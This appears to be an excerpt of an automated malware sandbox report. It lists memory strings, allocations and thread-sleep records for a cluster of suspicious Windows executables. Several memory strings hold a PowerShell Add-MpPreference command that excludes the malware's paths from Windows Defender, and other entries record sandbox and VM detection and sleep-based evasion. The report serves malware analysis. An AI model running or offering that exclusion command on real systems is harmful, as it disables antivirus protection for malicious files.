Source: powershell.exe, 0000000B.00000002.2226385244.0000020359FB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2226385244.000002035A14F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE,C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\LOCAL\TEMP\ -FORCE; ADD-MPPREFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: powershell.exe, 0000000B.00000002.2226385244.0000020359FB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: .EXE,C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\LOCAL\TEMP\ -FORCE; ADD-MPPREFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: powershell.exe, 0000000B.00000002.2475758964.0000020369591000.00000004.00000800.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXEH
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A4D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2226385244.000002035A14F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.000000000330D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D998776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319;C:\WINDOWS\SYSTEM32;C:\WINDOWS\SYSTEC:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEL
Source: aspnet_compiler.exe, 0000001A.00000002.4505036090.0000020D5F468000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\.\ROOT\CIMV2XEQFHBCICPZ.EXEID\TYPEID.EXEXHRLDAHGYEDUEERLSWKQRLLHAFDKOQRMXBTU\NCEMIXUJPIAKUIENHBMQFHBCICPZ.EXEW
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A4D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1976643095.000001D99A351000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TC:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: 52i.exe, 00000003.00000002.1760040160.00000202E60FC000.00000004.00000020.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1758398312.0000020280AF2000.00000004.00000020.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1762236134.00000202E7DB4000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1762236134.00000202E7DAF000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1758427761.0000020280AFB000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1976643095.000001D99A7E4000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2051647717.000001CD18D7C000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2327803772.000001CD3153B000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2329453099.000001CD3154D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <COMMAND>C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE</COMMAND>
Source: powershell.exe, 0000000B.00000002.2226385244.0000020359FB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NPATH C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE,C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\LOCAL\TEMP\ -FORCE; ADD-MPPREFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: powershell.exe, 0000000B.00000002.2226385244.0000020359FB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NPROCESS.EXE,C:\USERS\user\APPDATA\LOCAL\TEMP\ -FORCE; ADD-MPPREFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D998776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEW
Source: powershell.exe, 0000000B.00000002.2512972145.0000020371BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXEC:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEUX
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A14F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PATH C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE,C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\LOCAL\TEMP\ -FORCE; ADD-MPPREFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1976643095.000001D99A594000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1976643095.000001D99A5C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: .C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEP^
Source: kitty.exe, 00000004.00000002.1743728026.0000000000EFA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000007.00000002.1742802509.00000000012FD000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLOC
Source: TypeId.exe, 0000000C.00000002.1976643095.000001D99A594000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: RS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: 52i.exe, 00000003.00000002.1755825606.0000020280939000.00000004.00000020.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1757807075.00000202809F0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.2248079227.000001D9B2CF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1976643095.000001D99A5C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1976643095.000001D99A7E4000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2051647717.000001CD18D7C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: .C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1917485368.0000002DBCFE1000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: -TYPEID.EXE
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A4D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A14F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: REFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: 52i.exe, 00000003.00000002.1758157308.0000020280A63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D998776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXETIES
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D9987E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILE:///C:/USERS/user/APPDATA/ROAMING/GUID/TYPEID.EXEV
Source: powershell.exe, 0000000B.00000002.2504449619.00000203718F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\DH
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D998776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXEIN
Source: TypeId.exe, 0000000C.00000002.1976643095.000001D99A594000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: RS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: 52i.exe, 00000003.00000002.1757807075.00000202809F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEI.EXE
Source: powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: .C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEX
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D9987E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEEXEV
Source: Cerker.exe, 00000007.00000002.1742827791.000000000130E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLGZ
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A4D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D998776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE(A
Source: powershell.exe, 0000000B.00000002.2226385244.0000020359FB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1976643095.000001D99A351000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 5C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE.CONFIG`_
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D99879D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\LOCALC:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0\USAGELOGS\TYPEID.EXE.LOGPGX
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A14F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCESS.EXE,C:\USERS\user\APPDATA\LOCAL\TEMP\ -FORCE; ADD-MPPREFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A14F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE,C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINP^
Source: TypeId.exe, 0000000C.00000002.1976643095.000001D99A594000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: .C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE8
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D998770000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UID\TYPEID.EXE\user\APPDATA\ROAMINGCOMMONPROGRAMFILES=C:\PROGRAM FILES\COMMONMOPL$
Source: 52i.exe, 00000003.00000002.1757807075.00000202809F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEP
Source: powershell.exe, 0000000B.00000002.2226385244.0000020359FB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE,C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\LOCAL\TEMP\ -FORCE; ADD-MPPREFER
Source: kitty.exe, 00000004.00000002.1743728026.0000000000EFA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000007.00000002.1742802509.00000000012FD000.00000004.00000010.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: TypeId.exe, 0000000C.00000002.1917485368.0000002DBCFE1000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: -C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: 52i.exe, 00000003.00000002.1762236134.00000202E7D4F000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1976643095.000001D99A594000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1976643095.000001D99A5C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1928228831.000001D9987E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1976643095.000001D99A594000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1948317078.000001D99882C000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1928228831.000001D998770000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1974738735.000001D998A30000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1928228831.000001D998776000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.2246196648.000001D9B2CE7000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1976643095.000001D99A5C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.1928228831.000001D9987E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1949280233.000001D99884D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SSES\APPID\TYPEID.EXE
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D998770000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXEWINSTA0\DEFAULT
Source: TypeId.exe, 0000000C.00000002.1928228831.000001D998776000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TATEC:\WINDOWS\TEMP\ASLLOG_SHIMENGSTATE_TYPEID.EXE_7468.TXT
Source: TypeId.exe, 0000000C.00000002.1976643095.000001D99A351000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXE2
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A14F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE,C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\LOCAL\TEMP\ -FORCE; ADD-MPP
Source: powershell.exe, 0000000B.00000002.2512972145.0000020371BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXEC:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE/W
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A14F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TA\ROAMING\GUID\TYPEID.EXE,C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\LOCAL\TEMP\ -FORCE; ADD-MPPREFERENCE -EXCLUSIONPROCESS C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDINPROCESS.EXE,C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE
Source: powershell.exe, 0000000B.00000002.2226385244.000002035A4D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GUID\TYPEID.EXE
Source: powershell.exe, 0000000B.00000002.2226385244.0000020359FB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\ROAMING\GUID\TYPEID.EXE,C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\ADDIP^

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory allocated: D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory allocated: 1AAF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Memory allocated: 202E7990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Memory allocated: 202FFB20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Memory allocated: 1D998900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Memory allocated: 1D9B2350000 memory reserve \| memory write watch
Source: C:\Users\user\Pictures\Illumination.pif	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\user\Pictures\Illumination.pif	Memory allocated: 1AF20000 memory reserve \| memory write watch
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Memory allocated: 1350000 memory reserve \| memory write watch
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Memory allocated: 1B010000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Memory allocated: 900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Memory allocated: 1A650000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Memory allocated: 1840000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Memory allocated: 1B290000 memory reserve \| memory write watch
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Memory allocated: 1CD16FF0000 memory reserve \| memory write watch
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Memory allocated: 1CD30970000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 20D45170000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 20D5EAE0000 memory reserve \| memory write watch
Source: C:\Users\user\Windows.exe	Memory allocated: 1170000 memory reserve \| memory write watch
Source: C:\Users\user\Windows.exe	Memory allocated: 1B0C0000 memory reserve \| memory write watch
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Memory allocated: DD0000 memory reserve \| memory write watch
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Memory allocated: 1A810000 memory reserve \| memory write watch
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Memory allocated: 1530000 memory reserve \| memory write watch
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Memory allocated: 1B1C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Memory allocated: C70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Memory allocated: 1A970000 memory reserve \| memory write watch
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Memory allocated: 2B2F8630000 memory reserve \| memory write watch
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Memory allocated: 2B2F9F30000 memory reserve \| memory write watch
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Memory allocated: 209CEEA0000 memory reserve \| memory write watch
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Memory allocated: 209E71C0000 memory reserve \| memory write watch
Source: C:\Users\user\Windows.exe	Memory allocated: 11A0000 memory reserve \| memory write watch
Source: C:\Users\user\Windows.exe	Memory allocated: 1AF70000 memory reserve \| memory write watch
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	Memory allocated: 181565A0000 memory reserve \| memory write watch
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	Memory allocated: 1816FF10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	Memory allocated: 1850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	Memory allocated: 1B1E0000 memory reserve \| memory write watch
Source: C:\Users\user\Pictures\Illumination.pif	Memory allocated: E20000 memory reserve \| memory write watch
Source: C:\Users\user\Pictures\Illumination.pif	Memory allocated: 1AB40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Memory allocated: B10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Memory allocated: 1A960000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion

Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe

Code function: 3_2_00007FFD9BAB5C98 sldt word ptr [eax]

3_2_00007FFD9BAB5C98

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1200000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599355
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597156
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 591262
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 586094
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 585974
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 583273
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 580891
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 580081
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 576985
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 572129
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 570297
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 569485
Source: C:\Users\user\Windows.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Windows.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3753
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5990
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Window / User API: threadDelayed 1825
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Window / User API: threadDelayed 7882
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 6322
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 2495
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Window / User API: threadDelayed 9719

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	API coverage: 7.3 %
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	API coverage: 4.9 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API coverage: 2.1 %

Source: C:\Windows\System32\svchost.exe TID: 7772	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7768	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7812	Thread sleep time: -1320000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7844	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7840	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7812	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe TID: 7992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7364	Thread sleep count: 74 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7364	Thread sleep time: -740000s >= -30000s	Jump to behavior
